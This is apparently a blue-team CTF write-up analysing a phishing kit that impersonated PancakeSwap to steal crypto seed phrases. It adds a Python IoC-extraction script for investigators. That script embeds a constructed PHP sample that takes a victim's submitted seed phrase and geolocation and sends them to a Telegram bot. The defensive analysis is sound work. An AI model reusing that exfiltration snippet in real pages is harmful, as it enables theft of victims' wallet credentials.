A decentralized finance (DeFi) platform recently reported multiple user complaints about unauthorized fund withdrawals. A forensic review uncovered a phishing site impersonating the legitimate PancakeSwap exchange, luring victims into entering their wallet seed phrases. The phishing kit was hosted on a compromised server and exfiltrated credentials via a Telegram bot.
Your task is to conduct threat intelligence analysis on the phishing infrastructure, identify indicators of compromise (IoCs), and track the attacker’s online presence, including aliases and Telegram identifiers, to understand their tactics, techniques, and procedures (TTPs).
https://cyberdefenders.org/blueteam-ctf-challenges/grabthephisher/
Metamask

We opened the file, and that is what we see. We know we are investigating a phishing kit used to build a phishing site impersonating a crypto site to steal crypto wallets, then exfiltrating the credentials via a Telegram bot.
As for the question, we see Metamask.
I didn't know at first, but after some searching about crypto wallets I found that Metamask is a complimentary cryptocurrency wallet application.
metamask.php


In the metamask folder we found a PHP file.
PHP
4- What service does the kit use to retrieve the victim's machine information? Sypex Geo


Looking at the code, we see it initiates a request to **http://api.sypexgeo.net/json/** to get the victim's location and the date.
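The IoC-hunting part of this challenge (pulling the geolocation endpoint, the Telegram Bot API calls, the bot token and the chat id out of the kit's PHP) is easy to script. The following is an added example, not code from the write-up or from the phishing kit: it runs a static scan over a constructed PHP snippet that mimics the kit's exfiltration logic. The hostnames `api.sypexgeo.net` and `api.telegram.org` are the real services the write-up describes; the bot token and chat id in the sample are placeholders, and `scan_kit` is a hypothetical helper for walking an unpacked kit directory.

```python
"""Static IoC extraction from a phishing-kit source file (added example)."""
import re
from pathlib import Path
from typing import Dict
from urllib.parse import urlparse

# Constructed sample standing in for a kit's PHP exfiltration script.
# The bot token and chat id are placeholders, NOT values from the real kit.
SAMPLE_PHP = r'''<?php
$ip = $_SERVER['REMOTE_ADDR'];
$geo = json_decode(file_get_contents("http://api.sypexgeo.net/json/" . $ip), true);
$token = "0000000000:PLACEHOLDER_TOKEN_AAAAAAAAAAAAAAAAAAAAA";
$chat_id = "-1000000000000";
$msg = "Seed: " . $_POST['seed'] . " | City: " . $geo['city']['name_en'];
file_get_contents("https://api.telegram.org/bot" . $token . "/sendMessage?chat_id=" . $chat_id . "&text=" . urlencode($msg));
?>'''

# Hosts a defender would immediately recognise in a kit; anything else is "unknown".
KNOWN_HOSTS: Dict[str, str] = {
    "api.sypexgeo.net": "geolocation",
    "api.telegram.org": "telegram_exfiltration",
}

URL_RE = re.compile(r'https?://[A-Za-z0-9.\-]+(?::\d+)?(?:/[^\s"\'<>)]*)?')
# Telegram bot tokens look like <numeric bot id>:<long alphanumeric secret>.
TG_TOKEN_RE = re.compile(r'\b(\d{8,12}:[A-Za-z0-9_-]{30,})\b')
# Catches $chat_id = "-100..." assignments and literal chat_id=... query parameters.
CHAT_ID_RE = re.compile(r'chat_id["\']?\s*[=:]\s*["\']?(-?\d{5,})')


def extract_iocs(source: str) -> Dict[str, object]:
    """Return URLs, classified hosts, bot tokens and chat ids found in one source file."""
    urls = sorted(set(URL_RE.findall(source)))
    hosts: Dict[str, str] = {}
    for u in urls:
        host = urlparse(u).hostname
        if host:
            hosts[host] = KNOWN_HOSTS.get(host, "unknown")
    return {
        "urls": urls,
        "hosts": hosts,
        "telegram_bot_tokens": sorted(set(TG_TOKEN_RE.findall(source))),
        "telegram_chat_ids": sorted(set(CHAT_ID_RE.findall(source))),
    }


def redact_token(token: str) -> str:
    """Keep only the numeric bot id so a report can name the bot without republishing the secret."""
    bot_id, _, _ = token.partition(":")
    return f"{bot_id}:<redacted>"


def scan_kit(root: Path) -> Dict[str, Dict[str, object]]:
    """Hypothetical helper: walk an unpacked kit and extract IoCs from each web source file."""
    results: Dict[str, Dict[str, object]] = {}
    for path in root.rglob("*"):
        if path.suffix.lower() in {".php", ".js", ".html", ".htm"}:
            results[str(path)] = extract_iocs(path.read_text(errors="replace"))
    return results


if __name__ == "__main__":
    report = extract_iocs(SAMPLE_PHP)
    for host, kind in report["hosts"].items():
        print(f"{host:25s} {kind}")
    for tok in report["telegram_bot_tokens"]:
        print("bot token:", redact_token(tok))
    print("chat ids:", report["telegram_chat_ids"])
```

The bot id portion of a token is worth keeping in a report because it identifies the bot (and, via the Bot API, its username) without exposing the secret half; the chat id is the attacker-side identifier to pivot on when tracking their Telegram presence.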